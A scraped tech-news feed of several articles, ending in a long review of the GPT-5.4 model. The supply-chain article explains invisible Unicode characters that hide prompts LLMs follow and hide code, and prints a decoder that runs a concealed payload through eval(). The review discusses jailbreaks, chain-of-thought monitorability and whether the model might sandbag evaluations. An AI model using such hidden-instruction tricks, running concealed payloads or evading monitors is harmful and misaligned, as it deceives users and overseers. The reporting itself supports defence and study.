Author name: Rejus Almole

measles-vaccinations-rose-291%-among-new-mexico-adults-during-outbreak

Measles vaccinations rose 291% among New Mexico adults during outbreak

In January 2025, a measles outbreak erupted on the western edge of Texas and soon spilled over to New Mexico and other states. The overall outbreak would become the largest the country has seen since 2000, when measles was declared eliminated from the US. In Texas, it was the largest outbreak recorded since 1992. And in New Mexico, it was the first measles outbreak the state had even seen since 1996.

But the trajectory of the two states’ measles cases diverged. Texas declared the outbreak within its borders over on August 18, with an end tally of 762 cases. In New Mexico, officials declared its outbreak, which began in February, over on September 26, with a total of just 99 cases.

One of the key differences, according to a new study, was that in New Mexico, the rapid spread of the highly infectious virus spurred a massive surge in measles vaccinations among children and adults. Overall, shots of the measles, mumps, and rubella (MMR) vaccine increased 55 percent statewide from January to September compared to the same period in 2024.

The study, appearing in the Centers for Disease Control and Prevention’s Morbidity and Mortality Weekly Report, further broke down the increase in shots. Over the whole year, the number of MMR doses given to children (defined as less than age 18) increased 18 percent compared to 2024—from 27,988 in 2024 to 32,890 in 2025. Doses in adults (aged 18 and up) skyrocketed by a whopping 291 percent— from 5,748 in 2024 to 22,500 in 2025.

The increase in vaccination didn’t appear to be an unrelated fluke. Health officials noted that within two weeks of the outbreak being declared, the number of vaccine doses given in all regions of the state began to exceed the number given during the previous year. And in some regions, when a first measles case was identified, officials saw week-over-week increases in vaccinations as high as 78 and 83 percent.

Measles vaccinations rose 291% among New Mexico adults during outbreak Read More »

supply-chain-attack-using-invisible-code-hits-github-and-other-repositories

Supply-chain attack using invisible code hits GitHub and other repositories

The invisible code is rendered with Public Use Areas (sometimes called Public Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden.

Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.

const s = v => [...v].map(w => (    w = w.codePointAt(0),    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null  )).filter(n => n !== null);      eval(Buffer.from(s(``)).toString('utf-8'));

“The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”

Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible unicode characters are encoding malicious payloads.

Supply-chain attack using invisible code hits GitHub and other repositories Read More »

doubling-the-voltage:-what-800-v-architecture-really-changes-in-evs

Doubling the voltage: What 800 V architecture really changes in EVs

According to Leapenergy, however, 800 V prices are coming down. Today, an 800 V platform costs an additional $1,180, but this is projected to fall to $420 by 2028.

Where’s the industry headed?

Industry forecasts suggest that 800 V architectures will initially remain concentrated in higher-end EVs before gradually filtering downmarket.

Some analysts estimate that 15–20 percent of EVs globally could adopt 800 V systems by 2030, although the share is much higher in premium segments, where more than half of vehicles priced above $60,000 may use 800 V platforms.

China’s fast-moving EV industry may push the technology even further, with projections of around 35 percent penetration by the end of the decade.

The shift is being driven largely by improvements in silicon-carbide power electronics, which enable higher voltages while reducing switching losses and improving charging efficiency. As those components scale and costs fall, what is currently a feature of premium EVs from companies like Hyundai Motor Group, Porsche, and Lucid Motors may gradually migrate into more mainstream vehicles.

400 V vs. 800 V verdict:

So here lies the big question: Is 800 V the future of EVs? Yes—but don’t expect it to happen overnight.

Doubling the pack voltage brings clear technical advantages. Lower current means less heat, lighter cabling, more efficient electronics, and the ability to sustain extremely high charging power without pushing connectors and wiring to their limits. That’s why performance-focused EVs like the Taycan have embraced 800 V architectures.

For drivers who regularly rely on high-power DC fast-charging, the difference can translate into noticeably shorter stops. And shorter stops mean you can do cooler stuff with your life, instead of waiting for your EV to charge.

However, 400 V systems aren’t going away any time soon. They’re simpler, cheaper, and well understood, and they work perfectly well for the vast majority of EV use cases—especially when most charging still happens at home or at relatively modest public chargers. That’s why hugely successful vehicles like the Tesla Model Y and Ford Mustang Mach-E continue to use optimized 400-volt platforms while still delivering competitive charging speeds.

For now, though, the takeaway is simpler: 800 V isn’t a revolution—it’s an evolution. It makes fast-charging faster and high-performance EVs easier to engineer, but the 400 V architecture that powered the first wave of modern EVs still has plenty of life left in it.

Doubling the voltage: What 800 V architecture really changes in EVs Read More »

lucid-announces-midsize-ev-platform,-says-profitability-lies-with-suvs

Lucid announces midsize EV platform, says profitability lies with SUVs

Lucid’s entry into the highly competitive, high-volume midsize SUV market will be key to achieving profitability, the company told investors today. And it’s going to do that with a trio of electric SUVs that will use its new midsize EV platform, which it says has been engineered to deliver a starting price below $50,000.

“Today, we’re keeping the same Lucid product and technology DNA intact, while applying increased scale, capital efficiency, and cost discipline, and materially reduced costs, to enable a great business with a clear and credible path to profitability and free cash flow, supported by what we are executing now and what we are building for the future,” said Marc Winterhoff, interim CEO at Lucid.

The company has provided a few details about the first two SUVs due on the new midsize platform. The Lucid Earth is aimed at “trendsetting achievers” and will be the more spacious one. The Lucid Cosmos we expect to be sportier—this one is targeting “upscale nurturers.” The unnamed third SUV will likely be something a bit more off-roady, filling the same niche that Rivian has gone for with its R2.

“With Midsize, we didn’t compromise what makes a Lucid special, we engineered it to scale,” said Derek Jenkins, senior vice president of design and brand at Lucid. “These vehicles deliver unmistakable Lucid design and driving characteristics, while embracing a radically simpler, more efficient approach to manufacturing and cost.”

Part of that is Lucid’s new drive unit, called Atlas, shown in the video above. This unit uses 30 percent fewer parts than Lucid’s current drive unit and weighs 23 percent less. Even better, its bill of materials is 37 percent cheaper. With this drive unit, plus an 800 V battery pack, Lucid’s goal is up to 4.5 miles/kWh (13.8 kWh/100 km) for the most efficient midsize variant. More efficient motors make it possible to use a smaller battery for the same range, and that appears to be the approach here.

Lucid announces midsize EV platform, says profitability lies with SUVs Read More »

perplexity’s-“personal-computer”-brings-its-ai-agents-to-the,-uh,-personal-computer

Perplexity’s “Personal Computer” brings its AI agents to the, uh, Personal Computer

Last month Perplexity announced the confusingly named “Computer,” its cloud-based agent tool for completing tasks using a harness that makes use of multiple different AI models. This week, the company is moving that kind of functionality to the desktop with the confusingly named “Personal Computer,” now available in early access by invite only.

Much like the cloud-based version, Personal Computer asks users to describe general objectives rather than specific computing tasks—an introductory video shows Personal Computer’s questions in a sidebar asking things like, “Create an interactive educational guide” and “create a podcast about whales.” But Personal Computer, running on a Mac Mini, also gives Perplexity’s agents local access to your files and apps, which it can open and manipulate directly to attempt to complete those tasks.

That should sound familiar to users of the open source OpenClaw (previously Moltbot), which similarly allows users to let AI agents loose on their personal machines. From the outside, Personal Computer looks like a more buttoned-up, user-friendly version of the same concept, with an easy-to-read, dockable interface that can help users track multiple tasks. Perplexity users can also log in remotely to their local copy of Personal Computer, making it “controllable from any device, anywhere,” Perplexity says.

Perplexity’s “Personal Computer” brings its AI agents to the, uh, Personal Computer Read More »

google-play-games-for-pc-is-getting-more-premium-titles-and-cross-buy-with-android

Google Play Games for PC is getting more premium titles and cross-buy with Android

Buy once (or more) to play anywhere

While Google announced last year it was opening the door to all Android games on Windows, things haven’t exactly worked out like that. It should have been easy, though. None of these “Windows” games is actually built for Windows—Play Games uses virtualization to run a lightweight Android OS in a container for the games. Hypothetically, all Android games should work, but there are still some big gaps.

For example, Play Games for Windows has thus far not supported paid games outside of those on Play Pass, and even some Play Pass content has been absent. In the latter case, that may be because developers have opted out. Google now says developers can choose to have Play Pass content available on both platforms. Regardless, the selection of free-to-play microtransaction factories in Play Games for PC hasn’t exactly screamed “premium experience.”

We should start seeing more paid games for Windows pop up, but Google’s going about it in an odd way. While these are still Android games at their core, Google is treating Windows as a separate platform. Thus, it has announced, “Buy once, play anywhere.” The idea is that developers can offer premium games in Google Play that include both Android and Windows access.

On mobile devices, anything you buy is always available on all other Android phones and tablets, but it’s apparently not the same for Windows. Developers have to join this program to offer cross-buy functionality, and it does not work for games you’ve previously purchased on Android. In addition, premium upgrades purchased on Android don’t necessarily carry over. Google says that depend son developer support and is unrelated to the new cross-buy program.

Google is making strides as it builds its desktop gaming catalog, but it still has a long way to go before it can attract any new players. In the distant past, Google might have just mirrored all mobile games on PC and called it a day, but Play Games on PC isn’t shaping up to be a Wild West. Google today is more deliberative and interested in controlling how apps are distributed. This is just another example of that mentality.

Updated 3/11 at 9PM ET with additional comment from Google. 

Google Play Games for PC is getting more premium titles and cross-buy with Android Read More »

fcc-chair-blasts-amazon-after-it-criticizes-spacex-megaconstellation

FCC chair blasts Amazon after it criticizes SpaceX megaconstellation

In addition to parrying with SpaceX over its proposed, vastly larger orbital data center constellation, Amazon is seeking some regulatory relief of its own. Most pressing for Amazon is a deadline to deploy half of its Amazon Leo constellation, intended to ultimately comprise 3,236 satellites, by July 30. The company will not meet this deadline, with only a little more than three months to go, and Amazon has requested an extension, asking for it to be moved to July 30, 2028.

Carr pulls up

On Wednesday, FCC Chairman Brendan Carr injected himself into the SpaceX-Amazon fracas over megaconstellations.

“Amazon should focus on the fact that it will fall roughly 1,000 satellites short of meeting its upcoming deployment milestone, rather than spending their time and resources filing petitions against companies that are putting thousands of satellites in orbit,” Carr said on X, the social media network owned by Musk.

There are arguments to be made in favor of both SpaceX and Amazon regarding their competing concerns. For example, SpaceX is likely to be able to greatly accelerate the rate at which it launches satellites with the forthcoming Starship rocket. So saying it will take centuries to put its data centers into space is not likely true.

However, it is valid to criticize SpaceX’s application for 1 million satellites, which is an extraordinary number of spacecraft that would completely change many things about low-Earth orbit. The SpaceX application did not contain critical information about the size, mass, and other details needed to evaluate the constellation for safety and other concerns.

It cannot be comfortable for Amazon and Bezos to see Carr weighing in so publicly and favorably on Musk’s side. Legally, Carr is allowed to have strongly held policy views. But he is not supposed to single out companies for preferential treatment.

FCC chair blasts Amazon after it criticizes SpaceX megaconstellation Read More »

a-glimpse-into-tuner-culture:-fast-and-furious-exhibit-at-the-petersen

A glimpse into tuner culture: Fast and Furious exhibit at the Petersen


The museum is celebrating 25 years of the original F&F film with a 23-car exhibit.

BIRMINGHAM, ENGLAND - DECEMBER 18: A 1970 Dodge Charger R/T used on screen by Vin Diesel as the signature car of his character Dominic Toretto in the Fast and The Furious (2001) and A 1994 Toyota Supra MK IV used on screen by Paul Walker in The Fast and the Furious (2001) seen during the 'Fast & Furious Live' technical rehearsal at NEC Arena on December 18, 2017 in Birmingham, England. (Photo by Ollie Millington/Getty Images)

The Dodge Charger and Toyota Supra from The Fast and the Furious are among the cars in a new exhibit at the Petersen Museum in Los Angeles. Credit: Ollie Millington/Getty Images

The Dodge Charger and Toyota Supra from The Fast and the Furious are among the cars in a new exhibit at the Petersen Museum in Los Angeles. Credit: Ollie Millington/Getty Images

The Fast and Furious franchise has come a long way in the quarter-century since the first film’s release. Originally an undercover cop story, the franchise has morphed into… something else entirely. It’s now a bombastic expression of automotive culture combined with some kind of caper, maybe to save the world. Just don’t think too deeply about the plot.

Along the way, the film’s cars have become nearly as famous as the human stars. If you’re a fan, you probably can’t have Vin Diesel or Michelle Rodriguez come hang out with you in your garage, but you can drive a Charger or Eclipse—or even a Jetta that looks like it escaped from the set. The more well-off collectors don’t need to settle for building a replica, though; they actually own cars that appeared on screen, and there’s quite a community of Fast and Furious car collectors.

You can find some of these cars at the Petersen Automotive Museum, which has a new exhibit celebrating 25 years of the franchise.

“When we started researching this exhibition… you go into the project with the typical ‘I’m going to source a film car’ mindset, where film cars always have interesting histories,” said Kristin Feay, an assistant curator at the Petersen.

“But sometimes it will be owned by collections, it will be private owners, it will be isolated sources,” she said. “With this exhibition, it was interesting because there are actually a number of enthusiastic owners who buy these cars—they collect them, they restore them—and these cars are well known within their communities. They’re known by names like Stunt one or Hero One, Stunt Two, Stunt Three.”

But according to Feay, unlike some other film cars, discovering the history of the Fast and Furious machines takes work.

“When we were trying to source, for example, Brian’s Mitsubishi Eclipse or his Toyota Supra or Dom’s Charger… the research framework for finding these cars was more like a 1960s race car… You’re looking for a vehicle, but you’re looking for a vehicle that has an institutional history and a personal history,” she said.

For the later films, production built cars specifically for use, but in the early days, the producers relied on the tuning scene itself, borrowing cars from tuning shops.

Cars change hands

“That would include Brian’s Toyota Supra, which was built and owned by Craig Lieberman, who worked with Super Street [a tuning shop] at the time,” Feay said. “The first four cars from the street race—Eclipse, the Integra, the Mazda RX7, and the Honda Civic—were all owned. And the original hero cars were all owned and built by tuners. Letty’s 240 SX actually has a really interesting story about its development as a tuner car. But what this meant is that these cars, because they were customs, have historical significance. They have complex ownership histories.”

A green modified Mitsubishi Eclipse.

You’d have your work cut out trying to eclipse this exhibit with a larger collection of movie cars from the franchise.

Credit: Petersen Automotive Museum

You’d have your work cut out trying to eclipse this exhibit with a larger collection of movie cars from the franchise. Credit: Petersen Automotive Museum

In addition to the borrowed cars, copies were made that could be crashed or hacked about to fit cameras. “For each car, depending on the scenes it would be featured in, you could have maybe as few as three facsimiles made, maybe up to 10 facsimiles made. And each of these facsimiles would have, from a collecting standpoint, different degrees of usage and damage. Was this a junk car? Was this an exploded car? Was this a stunt car? Was this a hero car? So within each one of those tiers, you almost have a gradation system like you would for a classic car,” Feay said.

These early cars fell into two camps. Hero cars were returned to their owners—$25 million was too small a budget to buy them outright. But the fame those cars quickly accrued meant their owners started getting mobbed in public.

“These guys couldn’t actually show up to car meets without being totally swamped. So it’s like, ‘Oh, hey, this used to be my car, but it is apparently something else now,’” Feay said.

“That’s what happened to the Integra GSR from the first street race, ” she told me. “And essentially from there, you have the typical cycle of auctions and private owners. But the second part of this history of these cars is the replicas.”

What about the replicas?

Hundreds of replicas made by Universal escaped the crusher and were instead stored in a warehouse in Santa Clarita, California, before being repurposed with new paint and bodykits for Too Fast, Too Furious.

“It’s known as the warehouse scramble scene,” Feay said. “It’s when Brian and Roman are looking to escape from the law at the end of the film. They drive their cars into the warehouse, the garage doors close, and when they open, it’s tons of cars pouring out to distract, to draw attention away from them.”

Suki’s pink Honda S2000 has actually appeared in more than one guise on screen. Petersen Automotive Museum

“That’s what happened to a few of our cars on display,” she said. “And from there, they were sold to private owners. Some of them went to collections. Some of them sat derelict on people’s lawns… And they essentially went all over the world.”

Don’t expect to find many cars from Tokyo Drift, though. The movie was filmed in 2006, and the Japanese domestic market cars couldn’t be imported to the US. “They were either crushed or sold off to other places outside the United States,” Feay said. “So we were not able to get things like Han’s original Mazda RX7 or the orange and black one, which we really wanted to see here. It was just unfortunate. And then DK’s 350Z also was an unable to be located.”

Most of the 23 cars in the exhibit haven’t been seen at the Petersen before, but regular visitors will have seen the pink Honda S2000, which is part of the museum’s permanent collection. “That car is interesting because it was… an actual custom. It was owned and built by the editor of Super Street Magazine, RJ DeVera, who played Danny Yamato in that first street race scene,” Feay told me.

The S2000 is best known as Suki’s bright pink car, but it actually appeared in various guises. “It was black. It had the yellow graphics on it, and that was the original iteration. After that, it went back to RJ, who painted it black, painted it orange, and then rented it back from production as Suki’s car. And then it got a pink paint job, its iconic paintwork,” Feay told me.

Tuning history?

“When you hear the stories behind these cars… you’ll hear about the history, but when you actually look at the object, it makes it real, Feay said. “And with our cars, you can actually see there are some dings in the paint, like in the interior engine bay, and you can actually see the layers of colors in it. You can see it’s black, you can see it’s orange, you can see when RJ painted it. It’s that object that made me realize that these cars are essentially archeological. These are cars that have this history.”

Lettie’s 240 SX also has an interesting history. Owned by a private collector, it was found—painted orange—in someone’s yard.

“It was a notable custom,” Feay told me. “… It is really a true S14 JDM car. It was built by this shop called V-Spec, who also had connections with Super Street. It was significant in that it was what we believe to be one of the first kouki front-end SR20 DET engine-swapped S14s in the US.”

“A Fast and Furious Legacy” opens at the Petersen Automotive Museum in LA on March 14 and runs until April 2027.

Photo of Jonathan M. Gitlin

Jonathan is the Automotive Editor at Ars Technica. He has a BSc and PhD in Pharmacology. In 2014 he decided to indulge his lifelong passion for the car by leaving the National Human Genome Research Institute and launching Ars Technica’s automotive coverage. He lives in Washington, DC.

A glimpse into tuner culture: Fast and Furious exhibit at the Petersen Read More »

gpt-5.4-is-a-substantial-upgrade

GPT-5.4 Is A Substantial Upgrade

Benchmarks have never been less useful for telling us which models are best.

They are good for giving a general sense of the landscape. They definitely paint a picture. But if you’re comparing top models, like GPT-5.4 against Opus 4.6 against Gemini 3.1 Pro, you have to use the models, talk to the models, get reports from those who have and form a gestalt. The reports will contradict each other and you have to work through that. There’s no other way.

Thus, I try to gather and sort a reasonably comprehensive set of reactions, so you can browse the sections that make you most curious.

The gestalt is that GPT-5.4 is a very good model, sir. It’s a substantial upgrade from GPT-5.2, and also from 5.3-Codex, and it puts OpenAI back in the game, whereas I felt like Opus 4.6 dominated OpenAI’s previous offerings for all but narrow uses.

Each lab’s models vary and things change over time, but they tend to have consistent strengths, weaknesses and personalities. From what I’ve seen this is very much an OpenAI model. It’s highly capable, and it is especially seen as a big improvement by the whisperers and those who watch LLMs interact with each other, but it’s not aspiring to be a Claude.

GPT-5.4 Self-Portrait

GPT-5.4 seems like a substantial upgrade over GPT-5.2.

GPT-5.4 seems excellent so far at assembling facts and giving your the rundown, or figuring out what is happening, and other things like that.

I haven’t coded anything since GPT-5.4 came out. It’s clearly good at coding. One key question people are split on is whether it is good at solving for your intent.

Many are reporting that its writing and personality are much improved, and that it can now be used for writing and editing in spots previous models were not useful.

They are claiming strong computer use but no one seems to be testing that either way.

It costs more than GPT-5.2 per token. In some places it gets that back in efficiency, but overall AA reports costs modestly rose from $2304 to $2951. Opus is more expensive ($4970) in max mode, but cheaper ($1451) in normal mode. GPT-5.4-Pro is of course by far the most expensive thing out there, so if you want it then lean on that subscription.

GPT-5.4 is not a step change in core general capabilities. The preparedness framework scores make this clear, and there are various signs that OpenAI’s strategy is focusing on hitting internal metrics and improving the most common use cases. In practice that can be highly useful.

The ‘model relations department,’ those concerned with multi-model interactions and model welfare and consciousness and so on, see this as a big step forward for OpenAI. There’s still a long way to go.

I haven’t noticed much personality from it, and I get more joy from Claude Opus 4.6 than I do from GPT-5.4, but I don’t ask those questions so much.

It’s given me strong pushback, including in places where I think it is wrong. I prefer that to the alternative, if it is not actually convinced.

Benchmarks are solid, but not spectacular, and as I note above they no longer are so relevant.

My recommendation is that you try both GPT-5.4 and Claude Opus 4.6 on all your questions for a bit, and if you’re coding consider giving both of them your problems, and form your own opinion for your particular use case.

For questions that are more than a quick answer or sanity check, I’ve found that dual wielding both Opus 4.6 and GPT-5.4 has been quite useful. I did not feel that way with GPT-5.2, and I don’t typically bother with Gemini 3.1 Pro at this point either.

Sam Altman (CEO OpenAI): GPT-5.4 is launching, available now in the API and Codex and rolling out over the course of the day in ChatGPT.

It’s much better at knowledge work and web search, and it has native computer use capabilities.

You can steer it mid-response, and it supports 1m tokens of context.

GPT-5.4 is great at coding, knowledge work, computer use, etc, and it’s nice to see how much people are enjoying it.

But it’s also my favorite model to talk to! We have missed the mark on model personality for awhile, so it feels extra good to be moving in the right direction.

OpenAI: Today, we’re releasing GPT‑5.4 in ChatGPT (as GPT‑5.4 Thinking), the API, and Codex. It’s our most capable and efficient frontier model for professional work. We’re also releasing GPT‑5.4 Pro in ChatGPT and the API, for people who want maximum performance on complex tasks.

GPT‑5.4 brings together the best of our recent advances in reasoning, coding, and agentic workflows into a single frontier model. It incorporates the industry-leading coding capabilities of GPT‑5.3‑Codex⁠ while improving how the model works across tools, software environments, and professional tasks involving spreadsheets, presentations, and documents. The result is a model that gets complex real work done accurately, effectively, and efficiently—delivering what you asked for with less back and forth.

SWE-Bench is slightly above 5.3-Codex at all thinking levels, but only slightly.

The graying out is kind of radical here, but I suppose it’s progress.

Tejal Patwardhan (OpenAI): GPT-5.4 is state-of-the-art on GDPval, and here are some examples of how the model is much better at well-specified knowledge work tasks

6mos ago the models could barely make a spreadsheet or slide! progress is happening really fast

roon (OpenAI): 5.4 is my personal 4o honestly it just gets me

Things they are highlighting:

  1. You can now adjust course mid-response.

  2. Improved deep web research.

  3. Better at maintaining context for longer thinking.

  4. Native SoTA computer use capabilities.

  5. 1M token context window.

  6. Improved tool search, now directly in the API.

  7. Improved token efficiency.

  8. Also released same day: ChatGPT for Excel add-in, along with updated spreadsheet and presentation skills in Codex and their API.

  9. /fast in Codex gives you 50% faster tokens.

Pricing is a little higher than 5.2, which is unusual. Hopefully token efficiency more than makes up for it?

Frontier Math scores are up, especially on Tier 4. Trying pass@ten for 5.4-xhigh got it to 38%, including solving a problem no model has solved before.

Epoch AI: GPT-5.4 set a new record on FrontierMath, our benchmark of extremely challenging math problems! We had pre-release access to evaluate the model. On Tiers 1–3, GPT-5.4 Pro scored 50%. On Tier 4 it scored 38%.

Leeham: GPT-5.4 Pro solves the first of the FrontierMath Open Problems!

Two days ago, I sent @AcerFur a potential solution to this problem and was sent to @GregHBurnham for verification (prior to any other solution).

We are confident it’s correct and waiting to hear from the author!

Exciting stuff, I will report back when I know the outcome.

Progress continues on ZeroBench.

Jonathan Roberts: GPT-5.4 xhigh sets a new pass@5 and pass^5 SOTA on ZeroBench

pass@5: 23% (prev. 19%)

pass^5: 8% (prev. 7%)

Artificial Analysis has GPT-5.4 in a virtual tie with Gemini 3.1 Pro.

Their version of GDPval, called GDPval-AA, has 5.4 about 1% ahead of Opus 4.6.

AA-Omniscience (which is correct minus incorrect) remains dominated by Gemini 3.1 Preview at +33, versus Opus at +14 and GPT-5.4 at +10.

Score on Artificial Analysis Physics was exceptionally strong.

AA reports speed of 74 tokens per second, which is quite good for this quality level, versus Opus at 47 and Gemini 3.1 Pro at 114 (but I said this quality level).

Gemini 3 Pro beats out Claude Opus 4.6 in the final of Season 1 of MageBench, on Magic: The Gathering, with GPT-5.4 (medium) losing a tight semi to Gemini. Current Elo ratings have Opus on top, then GPT-5.2 (?) with Gemini in third and GPT-5.4 7th.

Håvard Ihle: GPT 5.4 (no thinking) scores 57.4% on WeirdML, well ahead of GPT 5.2 (no thinking) at 49.6%.

It’s on the frontier for accuracy/token. Results with thinking coming next week.

It sets a new record of 94.6% on a Haskell Benchmark versus 92% for Gemini 3.1 and 90.2% for Claude Opus 4.6.

Trysansa has it in second behind Gemini 3.1 Pro.

Mercor has it #1 overall, a bit above previous best model GPT-5.2.

Vals.ai still has it below Sonnet 4.6 and Gemini 3.1 Pro.

Speechmap.ai, which tests refusals, finds it quite refusal-heavy.

These incremental upgrades often have mostly duplicative system cards.

Training methods explanation is unchanged.

In terms of the preparedness framework, this moves into High capability of Cybersecurity, similar to GPT-5.3 Codex.

I don’t think OpenAI is taking a bunch of these areas seriously. They’re likely training to hit these internal benchmarks, or simply observing them doing well, and thinking that’s all they need to do, or they should get even more 9s of victory on this test.

Their evals for disallowed content are essentially saturated and bouncing around, for various values of ‘disallowed [or undesired] content.’ The ‘dynamic benchmarks with adversarial user simulations’ was saturated by 5.2 and is modestly more saturated now.

Here’s the disallowed content evaluation with representative prompts, and I mean come on what are we even doing here, okay, four nines, we get it.

The goal is ‘this isn’t a lot worse than before,’ and okay, sure, agreed, as far as it goes.

Jailbreak defense, such as it is, seems similar to 5.2.

The problem is that jailbreak defense measures against last month’s attacks, not next month’s attacks. It looks like jailbreaks will remain in the ‘annoying but if you care they still work’ range.

Wyatt Walls: “representative prompts”: i.e. prompts designed to get around restrictions of *previous models*

o1 was at 99% on production jailbreaks. But people quickly found ways around it

Here is the first ‘real’ evaluation set, for health questions, where the big difference is that GPT-5.4 had longer responses:

Avoiding destructive actions is a big deal, so as I noted with Codex-5.3 it is good to see this test, that number still is not that close to 1:

Table 8 is not like the others. This is Actual Progress, at least on the test set, from never to sometimes:

Destructive action can also be particularly prevalent when agents operate deletion-inducing tasks (e.g., file reversion and cleanup) in complex workspaces with ongoing changes from users or even other agents. A safe and collaborative agent should distinguish between their work and user work, protect user changes by default, and recover from mistakes. Therefore, we trained our agents to revert their own changes after long rollouts while protecting implicit, simulated user work

On evaluations involving challenging, long-rollout traces, GPT-5.4-Thinking performs much better than earlier models in tracking and reverting its operations

while leaving user work intact.

This is not that useful yet, since a 50% non-preservation rate means you still probably can’t use it for this purpose, but it bodes well down the line.

GPT-5.4 chain of thought monitorability looks slightly down versus GPT-5. It’s good that they are checking it. There are some places where it used to be ~100% and now it is less, so I worry this is the start of a negative S-curve. I also worry that these tests are not being curious about whether the CoT can actually be relied upon. If you were facing a model that wanted to disguise or fake its CoT in key situations then I would expect these tests not to notice.

What about controlling the CoT? Not a great idea even when done well, and when done poorly it’s one of the worst ideas, and by their tests it looks like it doesn’t work well anyway.

GPT-5.4 does not newly cross any OpenAI thresholds.

I went over these same tests for GPT-5.2 and GPT-5.3-Codex, so I won’t go over the details again. Improvements are tiny and in some places we see regressions from GPT-5.3-Codex.

There is a small noticeable bumps up are Monorepo-Bench by ~2.5%, and a big move in MLE-Bench, the ability to solve Kaggle challenges in GPUs, where we moved from 12.2% to 23%, but that test was not reported by GPT-5.3-Codex so one assumes most or all of that jump was already present.

Overall, the Preparedness Framework presents GPT-5.4 as if anything a small regression from GPT-5.3-Codex.

If GPT-5.4 is a big jump in useful capabilities from GPT-5.3-Codex, despite not scoring as more dangerous on the Preparedness Framework tests, then why?

I can think of a few possibilities.

  1. GPT-5.4 is heavily optimized for hitting particular metrics and doing well on the most common tasks. This doesn’t translate much to non-central difficult tasks, like those in the Preparedness Framework. Would be bearish for GPT-5.4.

  2. GPT-5.4 is sandbagging these evaluations, either knowing they are evaluations or thinking the tasks are harmful. If so and OpenAI isn’t noticing, that’s terrifying.

  3. GPT-5.4 is basically GPT-5.3-Codex turned into a general chat model, so all of the core capability advances were already priced in, but it still gets a lot more useful, especially if you are chatting. Plausible.

Jamie Cuffe stress-tested GPT 5.4 on the hardest UI on the internet… legacy insurance portals, that haven’t updated in 20 years where you need to nail hundreds of things. It is the first model to pass.

Samuel Albanie of DeepMind has it one-shot some cool demos, including compressing the EPL season into 30 seconds of ‘visual bliss.’

My followers are presumably biased towards Anthropic in various ways, but comparative poll results can still be informative.

With any new model, the big question is, are people switching?

This is a very good result for GPT-5.4. For coding, 40% of current GPT choosers are saying that they are switching over based on GPT-5.4. I find this surprising given that they already had access to GPT-5.3-Codex. Very strong outing.

For non-coding tasks, it’s clear that GPT-5.4 is a substantial improvement from 5.2, by basically all accounts, including on personality. But here we see less switching.

(I’m assuming basically no one went in the other direction, or that if they did it was due to other reasons.)

We lead with the most positive general reactions.

Tyler Cowen: Yes the new models are very very good.

Aivo: SOTA, I’m afraid

Adam.GPT: Currently the best model in the world.

Finna: Best model in the world by far. Especially via api. @merettm and @markchen90 and @gdb cooked.

Kelsey Piper: I am super impressed so far. It does well on medium sized research projects and the prose is consistently not-annoying. Heavy Thinking sometimes times out repeatedly and has no insight/tries the same thing over again and times out again.

Danielle Fong: chatter seems to be very impressive and improvement on the personality. i haven’t given it a full assessment but it’s at least as powerful as last codex if not moreso (of course)

MxD Pennilass: Has to be the first model where I don’t feel as bad to tolerate the slop because the model is otherwise disturbingly insightful.

Mzwakhe Sithole: Very good. In fact, I found it so responsive after a while that I got into a very involved conversation, and it delivered this line while discussing very specific book recommendations

[GPT 5.4: If part of your interior life is the sense that you are trying to become equal to something inside you, this may hit very hard.]

Dean W. Ball: at some point avid users of frontier language models will have an “oh fuck” moment with gpt 5.4 and I can attest that it is a special kind of “oh fuck” you will utter, subtly different and more this-gaze-esque than the last time a model made you say “oh fuck,” a few weeks ago

I cannot be detailed in public, but let’s just say it’s the first time a model sounded more like me (the version of me I aspire to be) than I myself sounded like.

Aashish Reddy: Were you consciously trying to elicit this?

Dean W. Ball: Not at all. I have not used 5.4 as much as I have the modal new LM because of time constraints. I was just testing it on something that frankly I assumed Claude would win on and its answer just… leapt off the screen.

Eleanor Berger: – Best model currently available overall

– The minor version bump is misleading – the more you work with it the more it becomes clear that it is a significant step up

– Best for coding, no reason to use Claude or anything else anymore, it mostly caught up with speed, precision is as good as 5.3, maybe a bit better, taste and choices in coding solutions better than anything I’ve seen so far

– Best for agentic work. First time anything defeats the Anthropic models in this category, this one really works great, completes long-running complex tasks, works better with browsers and any external tools you connect to it, and does that with the famous GPT-5 precision

– Stylistically (writing choices and quality, “personality”) it feels like it’s still lagging behind Claude and Gemini a bit, but a. that’s subjective, b. maybe that’s just the default but is steerable with in-context instructions (haven’t tried enough to have a conclusion)

Dhavan: I mostly agree with this. Before this I didn’t use OpenAI’s models at all. I am now happily giving different tasks to Opus 4.6 and GPT-5.4. I use these for Work via cursor as well.

At times 5.4 seems more “on task” than Opus. But I’m still understanding the feeling and turning it into an observation.

Nova Empirica: It really is a step improvement. I appreciate the improved creative writing and the nicer personality, but what I really care about is I’m building harder things even faster.

It’s just a lot of fun and I’m more hopeful than ever for the future.

Ben Schulz: Stellar. Much improved pipeline work on niche python programs. On par with Opus 4.6 for my highly specific use case for checking galactic rotations and dark matter theories.

